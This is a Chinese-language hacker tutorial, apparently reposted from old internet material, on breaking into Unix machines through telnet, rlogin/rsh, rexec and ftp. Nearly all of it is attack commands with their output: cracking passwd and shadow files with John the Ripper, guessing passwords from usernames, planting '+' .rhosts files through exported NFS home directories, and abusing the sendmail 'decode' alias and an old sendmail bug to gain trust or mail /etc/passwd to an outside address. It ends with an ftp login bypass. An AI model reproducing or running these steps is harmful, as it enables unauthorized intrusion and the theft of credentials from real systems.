轉自INTERNET
1) telnet
要點是取得用戶帳號和保密字
1.1) 取得用戶帳號
1.1.1) 使用「白手起家」中介紹的方法
1.1.2) 其他方法:e.g.根據從那個站點寄出的e-mail地址
1.2) 獲取口令
1.2.1) 口令破解
1.2.1.1) 使用「隔空取物」中介紹的方法取得/etc/passwd和/etc/shadow
1.2.1.2) 使用口令破解程序破解口令
e.g.使用john the riper:
# unshadow passwd shadow > pswd.1
# pwd_crack -single pswd.1
# pwd_crack -wordfile:/usr/dict/words -rules pswd.1
# pwd_crack -i:alph5 pswd.1
# dicgen 1 words1 /* 所有1音節的漢語拼音 */
# dicgen 2 words2 /* 所有2音節的漢語拼音 */
# dicgen 3 words3 /* 所有3音節的漢語拼音 */
# pwd_crack -wordfile:words1 -rules pswd.1
# pwd_crack -wordfile:words2 -rules pswd.1
# pwd_crack -wordfile:words3 -rules pswd.1
1.2.2) 蠻幹(brute force):猜測口令
猜法:與用戶名相同的口令,用戶名的簡單變體,機構名,機器型號etc
e.g. cxl: cxl,cxl111,cxl123,cxl12345,cxlsun,ultra30 etc...
2) r-命令:rlogin,rsh
關鍵在信任關係,即:/etc/hosts.equiv,~/.rhosts文件
2.1) /etc/hosts.equiv
如果/etc/hosts.equiv文件中有一個"+",那麼任何一台主機上的任何一個用戶(root除
外),可以遠程登錄而不需要口令,並成為該機上同名用戶;
2.2) ~/.rhosts
如果某用戶主目錄(home directory)下.rhosts文件中有一個"+",那麼任何一台主機上
的同名用戶可以遠程登錄而不需要口令
2.3) 改寫這兩個文件
2.3.1) nfs
如果某用戶的主目錄共享出來
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.rhosts
+
^D
$ rsh numen csh -i
Warning: no access to tty; thus no job control in this shell...
numen%
2.3.2) smtp
利用``decode''別名
a) 若任一用戶主目錄(e.g./home/zen)或其下.rhosts對daemon可寫,則
# echo "+" | uuencode /home/zen/.rhosts | mail [email protected]
(samsa:於是/home/zem/.rhosts中就出現一個"+")
b) 無用戶主目錄或其下.rhosts對daemon可寫,則利用/etc/aliases.pag,
因為許多系統中該文件是world-writable.
# cat decode
bin: "| cat /etc/passwd | mail [email protected]"
# newaliases -oQ/tmp -oA`pwd`/decode
# uuencode decode.pag /etc/aliases.pag | mail [email protected]
# /usr/lib/sendmail -fbin -om -oi [email protected] < /dev/null
(samsa:wait .....)
c) sendmail 5.59 以前的bug
# cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
+
.
quit
EOSM
# /bin/sh evil_sendmail
Trying xxx.xxx.xxx.xxx
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
# rlogin victim.com -l zen
Welcome to victim.com!
$
2.3.3) IP-spoofing
r-命令的信任關係建立在IP上,所以通過IP-spoofing可以獲得信任;
3) rexec
類似於telnet,也必須拿到用戶名和口令
4) ftp 的古老bug
# ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)